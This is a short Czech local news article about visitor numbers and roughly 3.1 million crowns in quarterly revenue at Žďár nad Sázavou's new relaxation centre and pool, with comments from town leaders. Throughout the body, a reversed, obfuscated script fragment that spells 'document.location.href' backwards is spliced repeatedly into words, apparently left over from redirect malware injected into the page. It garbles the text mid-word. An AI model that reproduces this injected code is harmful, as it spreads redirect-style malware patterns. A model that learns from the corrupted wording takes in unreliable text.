Žďár nad Sázavou, zdar nad sazavou, aktuality, rekreační centrum, bazén, tržby
Rainbow page separator

Tržby v bazénu překročily tři miliony korun

Pátek, 22. března 2013

relaxacni-centrum-bazen-zdar-nad-sazavouŽďár nad Sázavou / Čtyřicet tisíc lidí a tržby ve výši zhruba 3,1 milionu korun. To je čtvrtletní statistika nového žďárského relaxačního centra. Zástupci žďárské radnice jsou tím[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to výsledkem potěšeni. „Pokud by se podařilo ty[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to tržby udržet i v dalších měsících, na konci roku bychom byli na dvanácti milionech, což je předpokládaný odhad provozních nákladů relaxačního centra,“ vyjádřil se žďárský mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostarosta Jaromír Brychta k ideální variantě.

V praxi [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to ale podle něj bude s největší pravděpodobností trochu jiné, pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tože v zimě chodí do bazénu více lidí než v dalších ročních obdobích, kdy se nabízí řada vyžití v přírodě.

Žďárští radní předpokládají, že bazénovou částí ročně projde s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to tisíc lidí, saunou dvanáct tisíc a solnou jeskyní asi dva tisíce návštěvníků. Doplatek města by tak byl asi 3,5 milionu korun, což by bylo o milion méně, než činila podpora na fungování starého plaveckého bazénu. „Le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošní rok je víceméně zkušební a analytický, nemá smysl si dělat představy, že relaxační centrum bude hned vydělávat,“ uvedla starostka Žďáru nad Sázavou Dagmar Zvěřinová.